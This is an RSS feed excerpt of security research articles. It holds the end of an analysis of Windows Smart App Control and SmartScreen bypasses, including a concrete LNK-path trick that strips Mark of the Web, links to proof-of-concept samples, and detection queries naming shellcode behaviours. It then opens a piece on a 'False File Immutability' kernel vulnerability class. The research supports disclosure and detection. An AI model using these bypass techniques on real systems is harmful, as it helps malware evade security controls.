<p>The following video demonstrates hijacking with the <a href="https://github.com/jamplus/jamplus">JamPlus</a> build utility to bypass Smart App Control with no security warnings:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/rep_hijacking-jamasync.gif" alt="" /></p>
<p>In another example, SmartScreen security warnings were bypassed by using a known AutoHotkey interpreter:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/smartscreen-bypass-ahk-calc.gif" alt="" /></p>
<p>Another avenue to hijack the reputation of a known application is to exploit it. This could be simple, like a classic buffer overflow from reading an INI file in a predictable path. It could be something more complex that chains off other primitives (like command execution/registry write/etc). Also, multiple known apps can be chained together to achieve full code execution. For example, one application that reads a configuration file and executes a command line parameter can then be used to launch another known application that requires a set of parameters to gain arbitrary code execution.</p>
<h2>Reputation Seeding</h2>
<p>Another attack on reputation protections is to seed attacker-controlled binaries into the system. If crafted carefully, these binaries can appear benign and achieve a good reputation while still being useful to attackers later. It could simply be a new script host binary, an application with a known vulnerability, or an application that has a useful primitive. On the other hand, it could be a binary that contains embedded malicious code but only activates after a certain date or environmental trigger.</p>
<p>Smart App Control appears vulnerable to seeding. After executing a sample on one machine, it received a good label after approximately 2 hours. We noted that basic anti-emulation techniques seemed to be a factor in receiving a benign verdict or reputation. Fortunately, SmartScreen appears to have a higher global prevalence bar before trusting an application. A sample that demonstrates this technique is available <a href="https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-seeding/poc-rep-seeding.zip">here</a> and is demonstrated below:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/rephijack-primitive-seeding.gif" alt="" /></p>
<h2>Reputation Tampering</h2>
<p>A third attack class against reputation systems is reputation tampering. Normally, reputation systems use cryptographically secure hashing systems to make tampering infeasible. However, we noticed that certain modifications to a file did not seem to change the reputation for SAC. SAC may use fuzzy hashing or feature-based similarity comparisons in lieu of or in addition to standard file hashing. It may also leverage an ML model in the cloud to allow files that have a highly benign score (such as being very similar to known good). Surprisingly, some code sections could be modified without losing their associated reputation. Through trial and error, we could identify segments that could be safely tampered with and keep the same reputation. We crafted one <a href="https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-tampering/poc-rep-tampering.zip">tampered binary</a> with a unique hash that had never been seen by Microsoft or SAC. This embedded an “execute calc” shellcode and could be executed with SAC in enforcement mode:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/reptamperingpopcalc.gif" alt="" /></p>
<h2>LNK Stomping</h2>
<p>When a user downloads a file, the browser will create an associated “Zone.Identifier” file in an <a href="https://www.digital-detective.net/forensic-analysis-of-zone-identifier-stream/">alternate data stream</a> known as the Mark of the Web (MotW). This lets other software (including AV and EDR) on the system know that the file is more risky. SmartScreen only scans files with the Mark of the Web. SAC completely blocks certain file types if they have it. This makes MotW bypasses an interesting research target, as it can usually lead to bypassing these security systems. Financially motivated threat groups have discovered and leveraged <a href="https://blog.google/threat-analysis-group/magniber-ransomware-actors-used-a-variant-of-microsoft-smartscreen-bypass/">multiple vulnerabilities</a> to bypass MotW checks. These techniques involved appending crafted and invalid code signing signatures to javascript or MSI files.</p>
<p>During our research, we stumbled upon another MotW bypass that is trivial to exploit. It involves crafting LNK files that have non-standard target paths or internal structures. When clicked, these LNK files are modified by explorer.exe with the canonical formatting. This modification leads to removal of the MotW label before security checks are performed. The function that overwrites the LNK files is <strong>_SaveAsLink()</strong> as shown in the following call stack:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/image3.png" alt="" /></p>
<p>The function that performs the security check is <strong>CheckSmartScreen()</strong> as shown in the following call stack:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/image1.png" alt="" /></p>
<p>The easiest demonstration of this issue is to append a dot or space to the target executable path (e.g., <code>powershell.exe.</code>). Alternatively, one can create an LNK file that contains a relative path such as <code>.\target.exe</code>. After clicking the link, <code>explorer.exe</code> will search for and find the matching <code>.exe</code> name, automatically correct the full path, update the file on disk (removing MotW), and finally launch the target. Yet another variant involves crafting a multi-level path in a single entry of the LNK’s target path array. The target path array should normally have 1 entry per directory. The <a href="https://pypi.org/project/pylnk3/">pylnk3</a> utility shows the structure of an exploit LNK (non-canonical format) before and after execution (canonical format):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/image4.png" alt="" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/image2.png" alt="" /></p>
<p>A Python script that demonstrates these techniques is available <a href="https://github.com/joe-desimone/rep-research/blob/8e22c587e727ce2e3ea1ccab973941b7dd2244fc/lnk_stomping/lnk_stomping.py">here</a>.</p>
<p>The following shows an LNK file bypassing MotW restrictions under Smart App Control to launch Powershell and pop calc:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/sac-lnk-powershell.gif" alt="" /></p>
<p>In another example, we show this technique chained with the Microsoft cdb command line debugger to achieve arbitrary code execution and execute shellcode to pop calc:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/sac-lnk-cdb.gif" alt="" /></p>
<p>We identified multiple samples in VirusTotal that exhibit the bug, demonstrating existing in the wild usage. The oldest <a href="https://www.virustotal.com/gui/file/11dadc71018027c7e005a70c306532e5ea7abdc389964cbc85cf3b79f97f6b44/detection">sample</a> identified was submitted over 6 years ago. We also disclosed details of the bug to the MSRC. It may be fixed in a future Windows update. We are releasing this information, along with detection logic and countermeasures, to help defenders identify this activity until a patch is available.</p>
<h2>Detections</h2>
<p>Reputation hijacking, by its nature, can be difficult to detect. Countless applications can be co-opted to carry out the technique. Cataloging and blocking applications known to be abused is an initial (and continual) step.</p>
<pre><code>process where process.parent.name == &quot;explorer.exe&quot; and process.hash.sha256 in (
&quot;ba35b8b4346b79b8bb4f97360025cb6befaf501b03149a3b5fef8f07bdf265c7&quot;, // AutoHotKey
&quot;4e213bd0a127f1bb24c4c0d971c2727097b04eed9c6e62a57110d168ccc3ba10&quot; // JamPlus
)
</code></pre>
<p>However, this approach will always lag behind attackers. A slightly more robust approach is to develop behavioral signatures to identify general categories of abused software. For example, we can look for common Lua or Node.js function names or modules in suspicious call stacks:</p>
<pre><code>sequence by process.entity_id with maxspan=1m
[library where
  (dll.Ext.relative_file_creation_time &lt;= 3600 or
   dll.Ext.relative_file_name_modify_time &lt;= 3600 or
   (dll.Ext.device.product_id : (&quot;Virtual DVD-ROM&quot;, &quot;Virtual Disk&quot;,&quot;USB *&quot;) and not dll.path : &quot;C:\\*&quot;)) and
   _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info: &quot;*!luaopen_*&quot;)] by dll.hash.sha256
[api where
 process.Ext.api.behaviors : (&quot;shellcode&quot;, &quot;allocate_shellcode&quot;, &quot;execute_shellcode&quot;, &quot;unbacked_rwx&quot;, &quot;rwx&quot;, &quot;hook_api&quot;) and
 process.thread.Ext.call_stack_final_user_module.hash.sha256 : &quot;?*&quot;] by process.thread.Ext.call_stack_final_user_module.hash.sha256
</code></pre>
<pre><code>api where process.Ext.api.name : (&quot;VirtualProtect*&quot;, &quot;WriteProcessMemory&quot;, &quot;VirtualAlloc*&quot;, &quot;MapViewOfFile*&quot;) and
 process.Ext.api.behaviors : (&quot;shellcode&quot;, &quot;allocate_shellcode&quot;, &quot;execute_shellcode&quot;, &quot;unbacked_rwx&quot;, &quot;rwx&quot;, &quot;hook_api&quot;) and
 process.thread.Ext.call_stack_final_user_module.name : &quot;ffi_bindings.node&quot;
</code></pre>
<p>Security teams should pay particular attention to downloaded files. They can use local reputation to identify outliers in their environment for closer inspection.</p>
<pre><code>from logs-* | 
where host.os.type == &quot;windows&quot;
and event.category == &quot;process&quot; and event.action == &quot;start&quot;
and process.parent.name == &quot;explorer.exe&quot;
and (process.executable like &quot;*Downloads*&quot; or process.executable like &quot;*Temp*&quot;)
and process.hash.sha256 is not null
| eval process.name = replace(process.name, &quot; \\(1\\).&quot;, &quot;.&quot;)
| stats hosts = count_distinct(agent.id) by process.name, process.hash.sha256
| where hosts == 1
</code></pre>
<p>LNK stomping may have many variants, making signature-based detection on LNK files difficult. However, they should all trigger a similar behavioral signal- <code>explorer.exe</code> overwriting an LNK file. This is especially anomalous in the downloads folder or when the LNK has the Mark of the Web.</p>
<pre><code>file where event.action == &quot;overwrite&quot; and file.extension : &quot;lnk&quot; and
 process.name : &quot;explorer.exe&quot; and process.thread.Ext.call_stack_summary : &quot;ntdll.dll|*|windows.storage.dll|shell32.dll|*&quot; and
 (
  file.path : (&quot;?:\\Users\\*\\Downloads\\*.lnk&quot;, &quot;?:\\Users\\*\\AppData\\Local\\Temp\\*.lnk&quot;) or
  file.Ext.windows.zone_identifier == 3
  )
</code></pre>
<p>Finally, robust behavioral coverage around common attacker techniques such as in-memory evasion, persistence, credential access, enumeration, and lateral movement helps detect realistic intrusions, including from reputation hijacking.</p>
<h2>Conclusion</h2>
<p>Reputation-based protection systems are a powerful layer for blocking commodity malware. However, like any protection technique, they have weaknesses that can be bypassed with some care. Smart App Control and SmartScreen have a number of fundamental design weaknesses that can allow for initial access with no security warnings and minimal user interaction. Security teams should scrutinize downloads carefully in their detection stack and not rely solely on OS-native security features for protection in this area.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/dismantling-smart-app-control/Security Labs Images 19.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Introducing a New Vulnerability Class: False File Immutability]]></title>
            <link>https://www.elastic.co/kr/security-labs/false-file-immutability</link>
            <guid>false-file-immutability</guid>
            <pubDate>Thu, 11 Jul 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[This article introduces a previously-unnamed class of Windows vulnerability that demonstrates the dangers of assumption and describes some unintended security consequences.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>This article will discuss a previously-unnamed vulnerability class in Windows, showing how long-standing incorrect assumptions in the design of core Windows features can result in both undefined behavior and security vulnerabilities. We will demonstrate how one such vulnerability in the Windows 11 kernel can be exploited to achieve arbitrary code execution with kernel privileges.</p>
<h2>Windows file sharing</h2>
<p>When an application opens a file on Windows, it typically uses some form of the Win32 <a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew"><strong>CreateFile</strong></a> API.</p>
<pre><code class="language-c++">HANDLE CreateFileW(
  [in]           LPCWSTR               lpFileName,
  [in]           DWORD                 dwDesiredAccess,
  [in]           DWORD                 dwShareMode,
  [in, optional] LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  [in]           DWORD                 dwCreationDisposition,
  [in]           DWORD                 dwFlagsAndAttributes,
  [in, optional] HANDLE                hTemplateFile
);
</code></pre>
<p>Callers of <strong>CreateFile</strong> specify the access they want in <strong>dwDesiredAccess</strong>. For example, a caller would pass <strong>FILE_READ_DATA</strong> to be able to read data, or <strong>FILE_WRITE_DATA</strong> to be able to write data. The full set of access rights are <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/file-access-rights-constants">documented</a> on the Microsoft Learn website.</p>
<p>In addition to passing <strong>dwDesiredAccess</strong>, callers must pass a “sharing mode” in <strong>dwShareMode</strong>, which consists of zero or more of <strong>FILE_SHARE_READ</strong>, <strong>FILE_SHARE_WRITE</strong>, and <strong>FILE_SHARE_DELETE</strong>. You can think of a sharing mode as the caller declaring “I’m okay with others doing X to this file while I’m using it,” where X could be reading, writing, or renaming. For example, a caller that passes <strong>FILE_SHARE_WRITE</strong> allows others to write the file while they are working with it.</p>
<p>As a file is opened, the caller’s <strong>dwDesiredAccess</strong> is tested against the <strong>dwShareMode</strong> of all existing file handles. Simultaneously, the caller’s <strong>dwShareMode</strong> is tested against the previously-granted <strong>dwDesiredAccess</strong> of all existing handles to that file. If either of these tests fail, then <strong>CreateFile</strong> fails with a sharing violation.</p>
<p>Sharing isn’t mandatory. Callers can pass a share mode of zero to obtain exclusive access. Per Microsoft <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/creating-and-opening-files">documentation</a>:</p>
<blockquote>
<p>An open file that is not shared (dwShareMode set to zero) cannot be opened again, either by the application that opened it or by another application, until its handle has been closed. This is also referred to as exclusive access.</p>
</blockquote>
<h3>Sharing enforcement</h3>
<p>In the kernel, sharing is enforced by filesystem drivers. As a file is opened, it’s the responsibility of the filesystem driver to call <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iocheckshareaccess"><strong>IoCheckShareAccess</strong></a> or <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iochecklinkshareaccess"><strong>IoCheckLinkShareAccess</strong></a> to see whether the requested <strong>DesiredAccess</strong>/<strong>ShareMode</strong> tuple is compatible with any existing handles to the file being opened. <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/ntfs-overview">NTFS</a> is the primary filesystem on Windows, but it’s closed-source, so for illustrative purposes we’ll instead look at Microsoft’s FastFAT sample code performing <a href="https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L6822-L6884">the same check</a>. Unlike an IDA decompilation, it even comes with comments!</p>
<pre><code class="language-c++">//
//  Check if the Fcb has the proper share access.
//

return IoCheckShareAccess( *DesiredAccess,
                           ShareAccess,
                           FileObject,
                           &amp;FcbOrDcb-&gt;ShareAccess,
                           FALSE );
</code></pre>
<p>In addition to traditional read/write file operations, Windows lets applications map files into memory. Before we go deeper, it’s important to understand that <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views">section objects</a> are kernel parlance for <a href="https://learn.microsoft.com/en-us/windows/win32/memory/file-mapping">file mappings</a>; they are the same thing. This article focuses on the kernel, so it will primarily refer to them as section objects.</p>
<p>There are two types of section objects - data sections and executable image sections. Data sections are direct 1:1 mappings of files into memory. The file’s contents will appear in memory exactly as they do on disk. Data sections also have uniform memory permissions for the entire memory range. With respect to the underlying file, data sections can be either read-only or read-write. A read-write view of a file enables a process to read or write the file’s contents by reading/writing memory within its own address space.</p>
<p>Executable image sections (sometimes abbreviated to image sections) prepare <a href="https://learn.microsoft.com/en-us/windows/win32/debug/pe-format">PE files</a> to be executed. Image sections must be created from PE files. Examples of PE files include EXE, DLL, SYS, CPL, SCR, and OCX files. The kernel processes the PEs specially to prepare them to be executed. Different PE regions will be mapped in memory with different page permissions, depending on their metadata. Image views are <a href="https://en.wikipedia.org/wiki/Copy-on-write">copy-on-write</a>, meaning any changes in memory will be saved to the process’s private working set — never written to the backing PE.</p>
<p>Let’s say application A wants to map a file into memory with a data section. First, it opens that file with an API such as <strong>ZwCreateFile</strong>, which returns a file handle. Next, it passes this file handle to an API such as <strong>ZwCreateSection</strong> which creates a section object that describes how the file will be mapped into memory; this yields a section handle. The process then uses the section handle to map a “view” of that section into the process address space, completing the memory mapping.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image9.png" alt="Diagram showing how a file is mapped into memory" /></p>
<p>Once the file is successfully mapped, process A can close both the file and section handles, leaving zero open handles to the file. If process B later wants to use the file without the risk of it being modified externally, it would omit <strong>FILE_SHARE_WRITE</strong> when opening the file. <strong>IoCheckLinkShareAccess</strong> looks for open file handles, but since the handles were previously closed, it will not fail the operation.</p>
<p>This creates a problem for file sharing. Process B thinks it has a file open without risk of external modification, but process A can modify it through the memory mapping. To account for this, the filesystem must also call <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmdoesfilehaveuserwritablereferences"><strong>MmDoesFileHaveUserWritableReferences</strong></a>. This checks whether there are any active writable file mappings to the given file. We can see this check in the FastFAT example <a href="https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L6858-L6870">here</a>:</p>
<pre><code class="language-c++">//
//  Do an extra test for writeable user sections if the user did not allow
//  write sharing - this is neccessary since a section may exist with no handles
//  open to the file its based against.
//

if ((NodeType( FcbOrDcb ) == FAT_NTC_FCB) &amp;&amp;
    !FlagOn( ShareAccess, FILE_SHARE_WRITE ) &amp;&amp;
    FlagOn( *DesiredAccess, FILE_EXECUTE | FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | DELETE | MAXIMUM_ALLOWED ) &amp;&amp;
    MmDoesFileHaveUserWritableReferences( &amp;FcbOrDcb-&gt;NonPaged-&gt;SectionObjectPointers )) {

    return STATUS_SHARING_VIOLATION;
}
</code></pre>
<p>Windows requires PE files to be immutable (unmodifiable) while they are running. This prevents EXEs and DLLs from being changed on disk while they are running in memory. Filesystem drivers must use the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmflushimagesection"><strong>MmFlushImageSection</strong></a> function to check whether there are any active image mappings of a PE before allowing <strong>FILE_WRITE_DATA</strong> access. We can see this in the <a href="https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593">FastFAT example code</a>, and on <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/executable-images">Microsoft Learn</a>.</p>
<pre><code class="language-c++">//
//  If the user wants write access access to the file make sure there
//  is not a process mapping this file as an image. Any attempt to
//  delete the file will be stopped in fileinfo.c
//
//  If the user wants to delete on close, we must check at this
//  point though.
//

if (FlagOn(*DesiredAccess, FILE_WRITE_DATA) || DeleteOnClose) {

    Fcb-&gt;OpenCount += 1;
    DecrementFcbOpenCount = TRUE;

    if (!MmFlushImageSection( &amp;Fcb-&gt;NonPaged-&gt;SectionObjectPointers,
                              MmFlushForWrite )) {

        Iosb.Status = DeleteOnClose ? STATUS_CANNOT_DELETE :
                                      STATUS_SHARING_VIOLATION;
        try_return( Iosb );
    }
}
</code></pre>
<p>Another way to think of this check is that <strong>ZwMapViewOfSection(SEC_IMAGE)</strong> implies no-write-sharing as long as the view exists.</p>
<h2>Authenticode</h2>
<p>The <a href="https://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/authenticode_pe.docx">Windows Authenticode Specification</a> describes a way to employ cryptography to “sign” PE files. A “digital signature” cryptographically attests that the PE was produced by a particular entity. Digital signatures are tamper-evident, meaning that any material modification of signed files should be detectable because the digital signature will no longer match. Digital signatures are typically appended to the end of PE files.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image19.png" alt="Authenticode specification diagram showing a signature embedded within a PE" /></p>
<p>Authenticode can’t apply traditional hashing (e.g. <strong>sha256sum</strong>) in this case, because the act of appending the signature would change the file’s hash, breaking the signature it just generated. Instead, the Authenticode specification describes an algorithm to skip specific portions of the PE file that will be changed during the signing process. This algorithm is called <strong>authentihash</strong>. You can use authentihash with any hashing algorithm, such as SHA256. When a PE file is digitally signed, the file’s authentihash is what’s actually signed.</p>
<h3>Code integrity</h3>
<p>Windows has a few different ways to validate Authenticode signatures. User mode applications can call <a href="https://learn.microsoft.com/en-us/windows/win32/api/wintrust/nf-wintrust-winverifytrust"><strong>WinVerifyTrust</strong></a> to validate a file’s signature in user mode. The Code Integrity (CI) subsystem, residing in <code>ci.dll</code>,  validates signatures in the kernel. If <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard">Hypervisor-Protected Code Integrity</a> is running, the Secure Kernel employs <code>skci.dll</code> to validate Authenticode. This article will focus on Code Integrity (<code>ci.dll</code>) in the regular kernel.</p>
<p>Code Integrity provides both Kernel Mode Code Integrity and User Mode Code Integrity, each serving a different set of functions.</p>
<p>Kernel Mode Code Integrity (KMCI):</p>
<ul>
<li>Enforces <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/driver-signing">Driver Signing Enforcement</a> and the <a href="https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/microsoft-recommended-driver-block-rules#microsoft-vulnerable-driver-blocklist">Vulnerable Driver Blocklist</a></li>
</ul>
<p>User Mode Code Integrity (UMCI):</p>
<ul>
<li>CI validates the signatures of EXEs and DLLs before allowing them to load</li>
<li>Enforces <a href="https://learn.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#protected-processes">Protected Processes and Protected Process Light</a> signature requirements</li>
<li>Enforces <strong>ProcessSignaturePolicy</strong> mitigation (<a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setprocessmitigationpolicy"><strong>SetProcessMitigationPolicy</strong></a>)</li>
<li>Enforces <a href="https://learn.microsoft.com/en-us/cpp/build/reference/integritycheck-require-signature-check?view=msvc-170">INTEGRITYCHECK</a> for <a href="https://x.com/GabrielLandau/status/1668353640833114131">FIPS 140-2 modules</a>.</li>
<li>Exposed to consumers as <a href="https://learn.microsoft.com/en-us/windows/apps/develop/smart-app-control/overview">Smart App Control</a></li>
<li>Exposed to businesses as <a href="https://learn.microsoft.com/en-us/mem/intune/protect/endpoint-security-app-control-policy">App Control for Business</a> (formerly WDAC)</li>
</ul>
<p>KMCI and UMCI implement different policies for different scenarios. For example, the policy for Protected Processes is different from that of INTEGRITYCHECK.</p>
<h2>Incorrect assumptions</h2>
<p>Microsoft <a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea">documentation</a> implies that files successfully opened without write sharing can’t be modified by another user or process.</p>
<pre><code>FILE_SHARE_WRITE
0x00000002
Enables subsequent open operations on a file or device to request write access. Otherwise, other processes cannot open the file or device if they request write access.
</code></pre>
<p>If this flag is not specified, but the file or device has been opened for write access or has a file mapping with write access, the function fails.</p>
<p><em>Above, we discussed how sharing is enforced by the filesystem, but what if the filesystem doesn’t know that the file’s been modified?</em></p>
<p>Like most user mode memory, the Memory Manager (MM) in the kernel may page-out portions of file mappings when it deems necessary, such as when the system needs more free physical memory. Both data and executable image mappings may be paged-out. Executable image sections can never modify the backing file, so they’re effectively treated as read-only with respect to the backing PE file. As mentioned before, image sections are copy-on-write, meaning any in-memory changes immediately create a private copy of the given page.</p>
<p>When the memory manager needs to page-out a page from an image section, it can use the following decision tree:</p>
<ul>
<li>Never modified?  Discard it. We can read the contents back from the immutable file on disk.</li>
<li>Modified?  Save private copy it to the pagefile.
<ul>
<li>Example: If a security product hooks a function in <code>ntdll.dll</code>, MM will create a private copy of each modified page. Upon page-out, private pages will be written to the pagefile.</li>
</ul>
</li>
</ul>
<p>If those paged-out pages are later touched, the CPU will issue a page fault and the MM will restore the pages.</p>
<ul>
<li>Page never modified?  Read the original contents back from the immutable file on disk.</li>
<li>Page private?  Read it from the pagefile.</li>
</ul>
<p>Note the following exception: The memory manager may treat PE-relocated pages as unmodified, dynamically reapplying relocations during page faults.</p>
<h3>Page hashes</h3>
<p>Page hashes are a list of hashes of each 4KB page within a PE file. Since pages are 4KB, page faults typically occur on 4KB of data at a time. Full Authenticode verification requires the entire contiguous PE file, which isn’t available during a page fault. Page hashes allow the MM to validate hashes of individual pages during page faults.</p>
<p>There are two types of page hashes, which we’ve coined static and dynamic. Static page hashes are stored within a PE’s digital signature if the developer passes <code>/ph</code> to <a href="https://learn.microsoft.com/en-us/windows/win32/seccrypto/signtool"><code>signtool</code></a>. By pre-computing these, they are immediately available to the MM and CI upon module load.</p>
<p>CI can also compute them on-the-fly during signature validation, a mechanism we’re calling dynamic page hashes. Dynamic page hashes give CI flexibility to enforce page hashes even for files that were never signed with them.</p>
<p>Page hashes are not free - they use CPU and slow down page faults. They’re not used in most cases.</p>
<h2>Attacking code integrity</h2>
<p>Imagine a scenario where a ransomware operator wants to ransom a hospital, so they send a phishing email to a hospital employee. The employee opens the email attachment and enables macros, running the ransomware. The ransomware employs a UAC bypass to immediately elevate to admin, then attempts to terminate any security software on the system so it can operate unhindered. Anti-Malware services run as <a href="https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">Protected Process Light</a> (PPL), protecting them from tampering by malware with admin rights, so the ransomware can’t terminate the Anti-Malware service.</p>
<p>If the ransomware could also run as a PPL, it could terminate the Anti-Malware product. The ransomware can’t launch itself directly as a PPL because UMCI prevents improperly-signed EXEs and DLLs from loading into PPL, as we discussed above. The ransomware might try to inject code into a PPL by modifying an EXE or DLL that’s already running, but the aforementioned <strong>MmFlushImageSection</strong> ensures in-use PE files remain immutable, so this isn’t possible.</p>
<p>We previously discussed how the filesystem is responsible for sharing checks. <em>What would happen if an attacker were to move the filesystem to another machine?</em></p>
<p><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/what-is-a-network-redirector-">Network redirectors</a> allow the use of network paths with any API that accepts file paths. This is very convenient, allowing users and applications to easily open and memory-map files over the network. Any resulting I/O is transparently redirected to the remote machine. If a program is launched from a network drive, the executable images for the EXE and its DLLs will be transparently pulled from the network.</p>
<p>When a network redirector is in use, the server on the other end of the pipe needn’t be a Windows machine. It could be a Linux machine running <a href="https://en.wikipedia.org/wiki/Samba_(software)">Samba</a>, or even a python <a href="https://github.com/fortra/impacket/blob/d71f4662eaf12c006c2ea7f5ec09b418d9495806/examples/smbserver.py">impacket script</a> that “speaks” the <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview">SMB network protocol</a>. This means the server doesn’t have to honor Windows filesystem sharing semantics.</p>
<p>An attacker can employ a network redirector to modify a PPL’s DLL server-side, bypassing sharing restrictions. This means that PEs backing an executable image section are incorrectly assumed to be immutable. This is a class of vulnerability that we are calling <strong>False File Immutability</strong> (FFI).</p>
<h3>Paging exploitation</h3>
<p>If an attacker successfully exploits False File Immutability to inject code into an in-use PE, wouldn’t page hashes catch such an attack?  The answer is: sometimes. If we look at the following table, we can see that page hashes are enforced for kernel drivers and Protected Processes, but not for PPL, so let’s pretend we’re an attacker targeting PPL.</p>
<table>
<thead>
<tr>
<th></th>
<th>Authenticode</th>
<th>Page hashes</th>
</tr>
</thead>
<tbody>
<tr>
<td>Kernel drivers</td>
<td>✅</td>
<td>✅</td>
</tr>
<tr>
<td>Protected Processes (PP-Full)</td>
<td>✅</td>
<td>✅</td>
</tr>
<tr>
<td>Protected Process Light (PPL)</td>
<td>✅</td>
<td>❌</td>
</tr>
</tbody>
</table>
<p>Last year at Black Hat Asia 2023 (<a href="https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052">abstract</a>, <a href="http://i.blackhat.com/Asia-23/AS-23-Landau-PPLdump-Is-Dead-Long-Live-PPLdump.pdf">slides</a>, <a href="https://www.youtube.com/watch?v=5xteW8Tm410">recording</a>), we disclosed a vulnerability in the Windows kernel, showing how bad assumptions in paging can be exploited to inject code into PPL, defeating security features like <a href="https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection">LSA</a> &amp; <a href="https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">Anti-Malware Process Protection</a>. The attack leveraged False File Immutability assumptions for DLLs in PPLs, as we just described, though we hadn’t yet named the vulnerability class.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image5.png" alt="A diagram of the PPLFault exploit" /></p>
<p>Alongside the presentation, we released the <a href="https://github.com/gabriellandau/PPLFault">PPLFault exploit</a> which demonstrates the vulnerability by dumping the memory of an otherwise-protected PPL. We also released the GodFault exploit chain, which combines the PPLFault Admin-to-PPL exploit with the AngryOrchard PPL-to-kernel exploit to achieve full read/write control of physical memory from user mode. We did this to motivate Microsoft to take action on a vulnerability that MSRC <a href="https://www.elastic.co/kr/security-labs/forget-vulnerable-drivers-admin-is-all-you-need">declined to fix</a> because it did not meet their <a href="https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria">servicing criteria</a>. Thankfully, the Windows Defender team at Microsoft stepped up, <a href="https://x.com/GabrielLandau/status/1757818200127946922">releasing a fix</a> in February 2024 that enforces dynamic page hashes for executable images loaded over network redirectors, breaking PPLFault.</p>
<h2>New research</h2>
<p>Above, we discussed Authenticode signatures embedded within PE files. In addition to embedded signatures, Windows supports a form of detached signature called a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/catalog-files">security catalog</a>. Security catalogs (.cat files) are essentially a list of signed authentihashes. Every PE with an authentihash in that list is considered to be signed by that signer. Windows keeps a large collection of catalog files in <code>C:\Windows\System32\CatRoot</code> which CI loads, validates, and caches.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image7.png" alt="Simplified structure of a security catalog" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image21.png" alt="A security catalog rendered through Windows Explorer" /></p>
<p>A typical Windows system has over a thousand catalog files, many containing dozens or hundreds of authentihashes.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image16.png" alt="Security catalogs on a Windows 11 23H2 system" /></p>
<p>To use a security catalog, Code Integrity must first load it. This occurs in a few discrete steps. First, CI maps the file into kernel memory using <strong>ZwOpenFile</strong>, <strong>ZwCreateSection</strong>, and <strong>ZwMapViewOfSection</strong>. Once mapped, it validates the catalog’s digital signature using <strong>CI!MinCrypK_VerifySignedDataKModeEx</strong>. If the signature is valid, it parses the hashes with <strong>CI!I_MapFileHashes</strong>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image10.png" alt="The Code Integrity catalog parsing process" /></p>
<p>Breaking this down, we see a few key insights. First, <strong>ZwCreateSection(SEC_COMMIT)</strong> tells us that CI is creating a data section, not an image section. This is important because there is no concept of page hashes for data sections.</p>
